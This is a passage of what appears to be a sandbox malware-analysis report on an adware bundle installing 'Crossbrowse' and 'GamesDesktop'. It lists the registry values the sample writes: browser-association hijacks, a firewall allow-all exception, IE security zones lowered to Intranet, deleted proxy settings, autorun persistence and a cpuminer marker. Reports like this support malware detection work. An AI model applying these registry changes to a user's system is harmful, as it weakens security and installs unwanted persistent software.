"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "Crossbrowse"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"pv" = "39.6.2171.95"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallDate" = "20150902"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"ShowIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"Path" = "%Program Files%\Crossbrowse\Crossbrowse\Application"
[HKCR\HTTP]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse]
"(Default)" = "Crossbrowse"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "Crossbrowse"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "Crossbrowse"
[HKCR\CRSBRWSHTML]
"(Default)" = "Crossbrowse HTML Document"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"Name" = "Crossbrowse"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMinor" = "95"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"NoModify" = "1"
[HKLM\SOFTWARE\RegisteredApplications]
"Crossbrowse" = "Software\Clients\StartMenuInternet\Crossbrowse\Capabilities"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerResult" = "0"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Crossbrowse"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Crossbrowse\Crossbrowse\Application]
"crossbrowse.exe" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe:*:Enabled:Crossbrowse"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap"
"InstallerExtraCode1"
The process taskkill.exe:640 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 4B 26 41 07 0D F2 51 5C 12 12 79 63 75 50 EA"
The process taskkill.exe:584 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 8C 29 9E 8F C4 1A DF 23 B4 D4 F0 3E 5D 16 2D"
The process taskkill.exe:952 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 A1 EC F9 0B 25 64 A2 DF 9D F9 68 31 7F 53 66"
The process upgmsd_re_005010077.exe:1364 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010077"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "4A8590D6-D6DC-4C45-871E-B58D1E7D2C38"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 05 A0 7F 61 22 21 85 6A C0 55 01 7D 9B 5E 04"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010077.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process amisid.exe:1512 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 D6 6D 34 18 45 12 7C 1A C4 4F 22 BD 00 D4 24"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\InternetTurbo]
"UID" = "6FE5DDD064E91F40D31A83BB9FE8886E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process amisid.exe:1556 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "6FE5DDD064E91F40D31A83BB9FE8886E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 96 C9 29 73 80 08 DD 71 13 7F C1 A4 3E 99 D2"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process tasklist.exe:164 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 9A F1 81 6D 97 38 E3 2B D0 F9 33 28 7D 95 79"
The process tasklist.exe:1540 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 97 0A C9 A3 43 D3 B0 AF 04 F7 43 6C D0 12 32"
The process nsm25.tmp:240 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2A.tmp\Registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 F4 7B 71 13 0F 0B 16 89 AD 08 59 3A 27 6A E3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst16.tmp:1340 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 B9 28 2C B4 BE 4D C0 94 94 92 61 8D A7 D1 1F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsh2B.tmp:344 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"Inno Setup: User" = "%CurrentUserName%"
"Inno Setup: Setup Version" = "5.5.5 (a)"
"URLUpdateInfo" = "http://re.gamesdesktop.com"
"URLInfoAbout" = "http://re.gamesdesktop.com"
"Inno Setup: Icon Group" = "GAMESDESKTOP"
"HelpLink" = "http://re.gamesdesktop.com"
"Publisher" = "GAMESDESKTOP"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010077\unins000.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"DisplayName" = "GamesDesktop 092.005010077"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"Inno Setup: Language" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
